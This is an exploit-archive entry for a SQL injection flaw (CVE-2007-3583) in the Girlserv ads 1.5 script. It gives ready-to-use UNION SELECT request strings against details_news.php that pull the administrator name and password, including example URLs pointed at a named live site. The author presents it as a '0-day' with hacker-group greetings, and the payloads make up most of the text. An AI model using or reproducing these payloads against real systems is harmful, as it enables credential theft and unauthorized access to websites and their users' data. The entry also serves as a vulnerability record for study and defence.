Girlserv ads 1.5 - 'details_news.php' SQL Injection



EKU-ID: 12099 CVE: OSVDB-36365;CVE-2007-3583 OSVDB-ID:
Author: Cold Zero Published: 2007-07-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


Girlserv ads <= 1.5 Remote SQL Injection Vulnerability

Found By : Cold z3ro , Cold-z3ro@hotmail.com

Homepages : http://hackteach.org , http://h4ps.com

Script : http://www.girlserv-demo.com/girlserv-ads1.5.zip

For Admin :
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*
For password :
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*

Example ;
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*

=================================================
0-day Exploit :)
=================================================
Greets : Hackteach members , Pal-hacker.com admins ,  xp10.com members , and
All friend
=============================================
Cold !F iT z3ro , No One Equal One
=============================================

#Long life Palestine
#http://hackteach.org

# milw0rm.com [2007-07-03]